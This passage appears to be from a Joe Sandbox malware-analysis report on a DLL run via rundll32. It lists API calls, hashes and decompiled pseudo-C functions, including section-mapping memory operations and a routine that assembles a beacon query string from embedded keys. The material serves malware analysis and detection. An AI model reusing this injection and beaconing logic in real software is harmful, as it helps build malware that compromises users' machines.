                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                            • Part of subcall function 0628A806: GetProcAddress.KERNEL32(?,00000000), ref: 0628A82F
                                                            • Part of subcall function 0628A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,06286230,00000000,00000000,00000028,00000100), ref: 0628A851
                                                          • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 06286359
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                                          • String ID:
                                                          • API String ID: 3547194813-0
                                                          • Opcode ID: 4ed3e25dc225cead6af17355dd7bc62d8f500f71e84df368c56f7245ae3e6866
                                                          • Instruction ID: 187a0e65e72cad5bb6635c167ca4d559d0d0687ca82914930fa40aa326e047fb
                                                          • Opcode Fuzzy Hash: 4ed3e25dc225cead6af17355dd7bc62d8f500f71e84df368c56f7245ae3e6866
                                                          • Instruction Fuzzy Hash: 6F612D71A1160AAFDB55EF94CC80BEEB7B5FF08700F004169ED14A7281DB70E954CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 06280796
                                                          • GetProcAddress.KERNEL32(?), ref: 062807BE
                                                          • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 062807DC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressInformationProcProcess64QueryWow64memset
                                                          • String ID:
                                                          • API String ID: 2968673968-0
                                                          • Opcode ID: 8a0acc9b8c73b36dbc4c0ce750e6690c95037cd8a38f417f63007a2fa526f64f
                                                          • Instruction ID: 3ef459117ec59c8c70428f252f0205a7a9f88ed5e99bec6586be7b07831f0493
                                                          • Opcode Fuzzy Hash: 8a0acc9b8c73b36dbc4c0ce750e6690c95037cd8a38f417f63007a2fa526f64f
                                                          • Instruction Fuzzy Hash: B8113375A11319AFEB50EB54DC49F9977A9EB85740F054025ED04EB280D770ED09CFB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(0628EB0F,00000000,00000000,0628EB0F,00003000,00000040), ref: 06287981
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 06287988
                                                          • SetLastError.KERNEL32(00000000), ref: 0628798F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$AllocateLastMemoryStatusVirtual
                                                          • String ID:
                                                          • API String ID: 722216270-0
                                                          • Opcode ID: 7ba0cf3d1c1221cee4a5db0211cb8ae6b817cfd21729926b3cb98a6f62708aec
                                                          • Instruction ID: ca686000d9d333566ef1fef90ec9f41f53ad7752b29c6840f6e3589dca0de2a4
                                                          • Opcode Fuzzy Hash: 7ba0cf3d1c1221cee4a5db0211cb8ae6b817cfd21729926b3cb98a6f62708aec
                                                          • Instruction Fuzzy Hash: 69F0FEB1A21309FFEB05DB95DD09B9E77BCAB54356F104048A604A6080DBB4AB04DB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,0628907F,?,00000004,00000000,00000004,?), ref: 06285330
                                                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0628533F
                                                          • SetLastError.KERNEL32(00000000,?,0628907F,?,00000004,00000000,00000004,?,?,?,?,0627C691,?,00000000,CCCCFEEB,?), ref: 06285346
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$LastMemoryStatusVirtualWrite
                                                          • String ID:
                                                          • API String ID: 1089604434-0
                                                          • Opcode ID: b801e53b8f2e7a731a716520b6d03f0f6db782eb9993bc75087668b3106dd515
                                                          • Instruction ID: fd84c2d941ea37155f1132c99723c41cb5dc5af6a7f8de6b72c3b4aa72c655d9
                                                          • Opcode Fuzzy Hash: b801e53b8f2e7a731a716520b6d03f0f6db782eb9993bc75087668b3106dd515
                                                          • Instruction Fuzzy Hash: 5DE01A3261121AAFCF426EE8AC08DDE7B6AAB88651B048010BF01E2120C671C860EFF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 72%
                                                          			E036D190C(intOrPtr* __eax, void** _a4) {
                                                          				int _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				int _v28;
                                                          				int _v32;
                                                          				intOrPtr _v36;
                                                          				int _v40;
                                                          				int _v44;
                                                          				void* _v48;
                                                          				void* __esi;
                                                          				long _t34;
                                                          				void* _t39;
                                                          				void* _t47;
                                                          				intOrPtr* _t48;
                                                          
                                                          				_t48 = __eax;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v24 =  *((intOrPtr*)(__eax + 4));
                                                          				_v16 = 0;
                                                          				_v12 = 0;
                                                          				_v48 = 0x18;
                                                          				_v44 = 0;
                                                          				_v36 = 0x40;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v28 = 0;
                                                          				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                          				if(_t34 < 0) {
                                                          					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                          				} else {
                                                          					 *_t48 = _v16;
                                                          					_t39 = E036D6D0A(_t48,  &_v12); // executed
                                                          					_t47 = _t39;
                                                          					if(_t47 != 0) {
                                                          						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                          					} else {
                                                          						memset(_v12, 0, _v24);
                                                          						 *_a4 = _v12;
                                                          					}
                                                          				}
                                                          				return _t47;
                                                          			}

                                                          APIs
                                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,036D459D), ref: 036D1969
                                                            • Part of subcall function 036D6D0A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,036D197E,00000002,00000000,?,?,00000000,?,?,036D197E,00000000), ref: 036D6D37
                                                          • memset.NTDLL ref: 036D198B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateViewmemset
                                                          • String ID:
                                                          • API String ID: 2533685722-0
                                                          • Opcode ID: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                                                          • Instruction ID: d6097f7b3d0d768979899eea60dc9c407f0c4717e99d7677673394aed28c8859
                                                          • Opcode Fuzzy Hash: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                                                          • Instruction Fuzzy Hash: 24215EB5D00209AFDB00DFA9C8809EEFBF9FF48314F104429E606F7210D7709A098B64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D41FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                          				struct _FILETIME _v12;
                                                          				signed int _t11;
                                                          				void* _t16;
                                                          				short _t19;
                                                          				void* _t22;
                                                          				void* _t24;
                                                          				void* _t25;
                                                          				short* _t26;
                                                          
                                                          				_t24 = __edx;
                                                          				_t25 = E036D61FC(_t11, _a12);
                                                          				if(_t25 == 0) {
                                                          					_t22 = 8;
                                                          				} else {
                                                          					_t26 = _t25 + _a16 * 2;
                                                          					 *_t26 = 0; // executed
                                                          					_t16 = E036D2AE4(__ecx, _a4, _a8, _t25); // executed
                                                          					_t22 = _t16;
                                                          					if(_t22 == 0) {
                                                          						GetSystemTimeAsFileTime( &_v12);
                                                          						_t19 = 0x5f;
                                                          						 *_t26 = _t19;
                                                          						_t22 = E036D4822(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                                          					}
                                                          					HeapFree( *0x36da2d8, 0, _t25);
                                                          				}
                                                          				return _t22;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 036D61FC: lstrlen.KERNEL32(?,00000000,05969D70,00000000,036D39E8,05969F93,69B25F44,?,?,?,?,69B25F44,00000005,036DA00C,4D283A53,?), ref: 036D6203
                                                            • Part of subcall function 036D61FC: mbstowcs.NTDLL ref: 036D622C
                                                            • Part of subcall function 036D61FC: memset.NTDLL ref: 036D623E
                                                          • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,76C85520,00000008,00000014,004F0053,059693F4), ref: 036D4232
                                                          • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,76C85520,00000008,00000014,004F0053,059693F4), ref: 036D4260
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                          • String ID:
                                                          • API String ID: 1500278894-0
                                                          • Opcode ID: c53078b8d001e69932f966d5c9460af81f969f2f4cfc40ad5199714423edab5e
                                                          • Instruction ID: 489bdbd8c2af6771a9902719268d818c6ae138e70acc005fd889a2173b2a551b
                                                          • Opcode Fuzzy Hash: c53078b8d001e69932f966d5c9460af81f969f2f4cfc40ad5199714423edab5e
                                                          • Instruction Fuzzy Hash: A401B136A00209BADF22AF99EC44E9B7BB8FF84700F000029FA409A164DF71C824C754
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0628A82F
                                                          • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,06286230,00000000,00000000,00000028,00000100), ref: 0628A851
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressMemory64ProcReadVirtualWow64
                                                          • String ID:
                                                          • API String ID: 752694512-0
                                                          • Opcode ID: caea723b33c2739d290db277cc1cfc95f27b4f6344dea19f3531b552170760aa
                                                          • Instruction ID: a6337e62902af62ef3a3c4d8aa448620b93e5c899760285acd62cbea72a8d15e
                                                          • Opcode Fuzzy Hash: caea723b33c2739d290db277cc1cfc95f27b4f6344dea19f3531b552170760aa
                                                          • Instruction Fuzzy Hash: 6FF0F976A10209BFCB129F99EC48C9EBBFAEBC9750714411AFA14D7220D6719552DF30
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E036D6D0A(void** __esi, PVOID* _a4) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				long _t13;
                                                          
                                                          				_v16 = 0;
                                                          				asm("stosd");
                                                          				_v8 = 0;
                                                          				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                          				if(_t13 < 0) {
                                                          					_push(_t13);
                                                          					return __esi[6]();
                                                          				}
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,036D197E,00000002,00000000,?,?,00000000,?,?,036D197E,00000000), ref: 036D6D37
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                          • Instruction ID: 3aaa8ef4fe390441e141716ed24711e5db94287f088e90313aeeaec628a0479a
                                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                          • Instruction Fuzzy Hash: A8F01CB690020CBFEB11DFA5DC85CAFBBBDEB48294B104939F152E5094D670AE088A60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,0627717E,00000000,00000000,0627717E,?,00000002,00000000,?,0627C71A,00000000,0627717E,000000FF,?), ref: 0628BEAE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                                          • Instruction ID: 59a99ea95609f1ba80842223f73ea737735f395e1f123aec9d5fa79b8f9f4c5e
                                                          • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                                          • Instruction Fuzzy Hash: E1F012B690020CFFEB519FA5CC85CDFBBFDEB44245B008869F652E1050D2719E18DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0629A400), ref: 062774C5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: f47cb6ab51c46f4bd6e67c354e400a54e4086deb10f103ddcc508cad21e0c0a6
                                                          • Instruction ID: a9d53235c8d8ad9dc1918aed37b2f923a9efbd40d032d119d532faf3bfdb9206
                                                          • Opcode Fuzzy Hash: f47cb6ab51c46f4bd6e67c354e400a54e4086deb10f103ddcc508cad21e0c0a6
                                                          • Instruction Fuzzy Hash: 72F08231B201159FC760CE59EC88E9BBFB9FB467947144114EE04DB260D370E905DBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 70%
                                                          			E036D56C8(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v20;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v32;
                                                          				void* _v48;
                                                          				intOrPtr _v56;
                                                          				void* __edi;
                                                          				intOrPtr _t32;
                                                          				void* _t33;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t36;
                                                          				intOrPtr _t37;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t39;
                                                          				void* _t42;
                                                          				intOrPtr _t43;
                                                          				int _t46;
                                                          				intOrPtr _t47;
                                                          				int _t50;
                                                          				void* _t51;
                                                          				intOrPtr _t55;
                                                          				intOrPtr _t56;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t66;
                                                          				intOrPtr* _t68;
                                                          				void* _t69;
                                                          				intOrPtr _t74;
                                                          				intOrPtr _t80;
                                                          				intOrPtr _t83;
                                                          				intOrPtr _t86;
                                                          				int _t89;
                                                          				intOrPtr _t90;
                                                          				int _t93;
                                                          				intOrPtr _t95;
                                                          				int _t98;
                                                          				intOrPtr _t100;
                                                          				int _t103;
                                                          				void* _t105;
                                                          				void* _t106;
                                                          				void* _t110;
                                                          				void* _t112;
                                                          				void* _t113;
                                                          				intOrPtr _t114;
                                                          				long _t116;
                                                          				intOrPtr* _t117;
                                                          				intOrPtr* _t118;
                                                          				long _t119;
                                                          				int _t120;
                                                          				void* _t121;
                                                          				void* _t122;
                                                          				void* _t123;
                                                          				void* _t126;
                                                          				void* _t127;
                                                          				void* _t129;
                                                          				void* _t130;
                                                          
                                                          				_t110 = __edx;
                                                          				_t106 = __ecx;
                                                          				_t127 =  &_v16;
                                                          				_t119 = __eax;
                                                          				_t32 =  *0x36da3e0; // 0x5969b78
                                                          				_v4 = _t32;
                                                          				_v8 = 8;
                                                          				_t33 = RtlAllocateHeap( *0x36da2d8, 0, 0x800); // executed
                                                          				_t105 = _t33;
                                                          				if(_t105 != 0) {
                                                          					if(_t119 == 0) {
                                                          						_t119 = GetTickCount();
                                                          					}
                                                          					_t35 =  *0x36da018; // 0x3df0b315
                                                          					asm("bswap eax");
                                                          					_t36 =  *0x36da014; // 0x3a87c8cd
                                                          					asm("bswap eax");
                                                          					_t37 =  *0x36da010; // 0xd8d2f808
                                                          					asm("bswap eax");
                                                          					_t38 =  *0x36da00c; // 0x81762942
                                                          					asm("bswap eax");
                                                          					_t39 =  *0x36da348; // 0x228d5a8
                                                          					_t3 = _t39 + 0x36db62b; // 0x74666f73
                                                          					_t120 = wsprintfA(_t105, _t3, 2, 0x3d175, _t38, _t37, _t36, _t35,  *0x36da02c,  *0x36da004, _t119);
                                                          					_t42 = E036D6927();
                                                          					_t43 =  *0x36da348; // 0x228d5a8
                                                          					_t4 = _t43 + 0x36db66b; // 0x74707526
                                                          					_t46 = wsprintfA(_t120 + _t105, _t4, _t42);
                                                          					_t129 = _t127 + 0x38;
                                                          					_t121 = _t120 + _t46;
                                                          					if(_a12 != 0) {
                                                          						_t100 =  *0x36da348; // 0x228d5a8
                                                          						_t8 = _t100 + 0x36db676; // 0x732526
                                                          						_t103 = wsprintfA(_t121 + _t105, _t8, _a12);
                                                          						_t129 = _t129 + 0xc;
                                                          						_t121 = _t121 + _t103;
                                                          					}
                                                          					_t47 =  *0x36da348; // 0x228d5a8
                                                          					_t10 = _t47 + 0x36db2de; // 0x74636126
                                                          					_t50 = wsprintfA(_t121 + _t105, _t10, 0);
                                                          					_t130 = _t129 + 0xc;
                                                          					_t122 = _t121 + _t50; // executed
                                                          					_t51 = E036D22D7(_t106); // executed
                                                          					_t112 = _t51;
                                                          					if(_t112 != 0) {
                                                          						_t95 =  *0x36da348; // 0x228d5a8
                                                          						_t12 = _t95 + 0x36db8d0; // 0x736e6426
                                                          						_t98 = wsprintfA(_t122 + _t105, _t12, _t112);
                                                          						_t130 = _t130 + 0xc;
                                                          						_t122 = _t122 + _t98;
                                                          						HeapFree( *0x36da2d8, 0, _t112);
                                                          					}
                                                          					_t113 = E036D2A11();
                                                          					if(_t113 != 0) {
                                                          						_t90 =  *0x36da348; // 0x228d5a8
                                                          						_t14 = _t90 + 0x36db8d8; // 0x6f687726
                                                          						_t93 = wsprintfA(_t122 + _t105, _t14, _t113);
                                                          						_t130 = _t130 + 0xc;
                                                          						_t122 = _t122 + _t93;
                                                          						HeapFree( *0x36da2d8, 0, _t113);
                                                          					}
                                                          					_t114 =  *0x36da3cc; // 0x59695b0
                                                          					_a20 = E036D2509(0x36da00a, _t114 + 4);
                                                          					_t55 =  *0x36da370; // 0x0
                                                          					_t116 = 0;
                                                          					if(_t55 != 0) {
                                                          						_t86 =  *0x36da348; // 0x228d5a8
                                                          						_t17 = _t86 + 0x36db8b2; // 0x3d736f26
                                                          						_t89 = wsprintfA(_t122 + _t105, _t17, _t55);
                                                          						_t130 = _t130 + 0xc;
                                                          						_t122 = _t122 + _t89;
                                                          					}
                                                          					_t56 =  *0x36da36c; // 0x0
                                                          					if(_t56 != _t116) {
                                                          						_t83 =  *0x36da348; // 0x228d5a8
                                                          						_t19 = _t83 + 0x36db889; // 0x3d706926
                                                          						wsprintfA(_t122 + _t105, _t19, _t56);
                                                          					}
                                                          					if(_a20 != _t116) {
                                                          						_t123 = RtlAllocateHeap( *0x36da2d8, _t116, 0x800);
                                                          						if(_t123 != _t116) {
                                                          							E036D1BE9(GetTickCount());
                                                          							_t62 =  *0x36da3cc; // 0x59695b0
                                                          							__imp__(_t62 + 0x40);
                                                          							asm("lock xadd [eax], ecx");
                                                          							_t66 =  *0x36da3cc; // 0x59695b0
                                                          							__imp__(_t66 + 0x40);
                                                          							_t68 =  *0x36da3cc; // 0x59695b0
                                                          							_t69 = E036D1D33(1, _t110, _t105,  *_t68); // executed
                                                          							_t126 = _t69;
                                                          							asm("lock xadd [eax], ecx");
                                                          							if(_t126 != _t116) {
                                                          								StrTrimA(_t126, 0x36d928c);
                                                          								_push(_t126);
                                                          								_t74 = E036D393C();
                                                          								_v20 = _t74;
                                                          								if(_t74 != _t116) {
                                                          									_t117 = __imp__;
                                                          									 *_t117(_t126, _v8);
                                                          									 *_t117(_t123, _v8);
                                                          									_t118 = __imp__;
                                                          									 *_t118(_t123, _v32);
                                                          									 *_t118(_t123, _t126);
                                                          									_t80 = E036D375F(0xffffffffffffffff, _t123, _v28, _v24); // executed
                                                          									_v56 = _t80;
                                                          									if(_t80 != 0 && _t80 != 0x10d2) {
                                                          										E036D561E();
                                                          									}
                                                          									HeapFree( *0x36da2d8, 0, _v48);
                                                          									_t116 = 0;
                                                          								}
                                                          								HeapFree( *0x36da2d8, _t116, _t126);
                                                          							}
                                                          							RtlFreeHeap( *0x36da2d8, _t116, _t123); // executed
                                                          						}
                                                          						HeapFree( *0x36da2d8, _t116, _a12);
                                                          					}
                                                          					RtlFreeHeap( *0x36da2d8, _t116, _t105); // executed
                                                          				}
                                                          				return _v16;
                                                          			}

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 036D56F0
                                                          • GetTickCount.KERNEL32 ref: 036D5704
                                                          • wsprintfA.USER32 ref: 036D5753
                                                          • wsprintfA.USER32 ref: 036D5770
                                                          • wsprintfA.USER32 ref: 036D5791
                                                          • wsprintfA.USER32 ref: 036D57A9
                                                          • wsprintfA.USER32 ref: 036D57CC
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 036D57DC
                                                          • wsprintfA.USER32 ref: 036D57FE
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 036D580E
                                                          • wsprintfA.USER32 ref: 036D5847
                                                          • wsprintfA.USER32 ref: 036D5867
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 036D5882
                                                          • GetTickCount.KERNEL32 ref: 036D5892
                                                          • RtlEnterCriticalSection.NTDLL(05969570), ref: 036D58A6
                                                          • RtlLeaveCriticalSection.NTDLL(05969570), ref: 036D58C4
                                                          • StrTrimA.SHLWAPI(00000000,036D928C,00000000,059695B0), ref: 036D58F6
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 036D5915
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 036D591C
                                                          • lstrcat.KERNEL32(00000000,?), ref: 036D5929
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 036D592D
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 036D595D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 036D596D
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,00000000,059695B0), ref: 036D597B
                                                          • HeapFree.KERNEL32(00000000,?), ref: 036D598C
                                                          • RtlFreeHeap.NTDLL(00000000,00000000), ref: 036D599A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$wsprintf$Free$AllocateCountCriticalSectionTicklstrcatlstrcpy$EnterLeaveTrim
                                                          • String ID:
                                                          • API String ID: 2591679948-0
                                                          • Opcode ID: a8ac4eafa4b18a7eb6c334a1a885aff7a3a0bc22132c59079791e28f7e256c05
                                                          • Instruction ID: a72c230ee1115e542988a15579d1a0a0f529bd7e834eccb24f03cb4e73c8fb99
                                                          • Opcode Fuzzy Hash: a8ac4eafa4b18a7eb6c334a1a885aff7a3a0bc22132c59079791e28f7e256c05
                                                          • Instruction Fuzzy Hash: FC81E271C05204AFC711FBA9FC48E5B7BE9EB89304B0A1518F909D721CD732D925DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0628E846), ref: 06273528
                                                          • RtlDeleteCriticalSection.NTDLL(0629A3E0), ref: 0627355B
                                                          • RtlDeleteCriticalSection.NTDLL(0629A400), ref: 06273562
                                                          • ReleaseMutex.KERNEL32(000005C0,00000000,?,?,?,0628E846), ref: 0627358B
                                                          • FindCloseChangeNotification.KERNEL32(?,?,0628E846), ref: 06273597
                                                          • ResetEvent.KERNEL32(00000000,00000000,?,?,?,0628E846), ref: 062735A3
                                                          • CloseHandle.KERNEL32(?,?,0628E846), ref: 062735AF
                                                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0628E846), ref: 062735B5
                                                          • SleepEx.KERNEL32(00000064,00000001,?,?,0628E846), ref: 062735C9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0628E846), ref: 062735ED
                                                          • RtlRemoveVectoredExceptionHandler.NTDLL(061605B8), ref: 06273623
                                                          • SleepEx.KERNEL32(00000064,00000001,?,?,0628E846), ref: 0627363F
                                                          • FindCloseChangeNotification.KERNEL32(0689F2C8,?,?,0628E846), ref: 06273668
                                                          • LocalFree.KERNEL32(?,?,0628E846), ref: 06273678
                                                            • Part of subcall function 06271268: GetVersion.KERNEL32(?,?,76CDF720,?,06273517,00000000,?,?,?,0628E846), ref: 0627128C
                                                            • Part of subcall function 06271268: GetModuleHandleA.KERNEL32(?,068997B5,?,76CDF720,?,06273517,00000000,?,?,?,0628E846), ref: 062712A9
                                                            • Part of subcall function 06271268: GetProcAddress.KERNEL32(00000000), ref: 062712B0
                                                            • Part of subcall function 0628E869: RtlEnterCriticalSection.NTDLL(0629A400), ref: 0628E873
                                                            • Part of subcall function 0628E869: RtlLeaveCriticalSection.NTDLL(0629A400), ref: 0628E8AF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
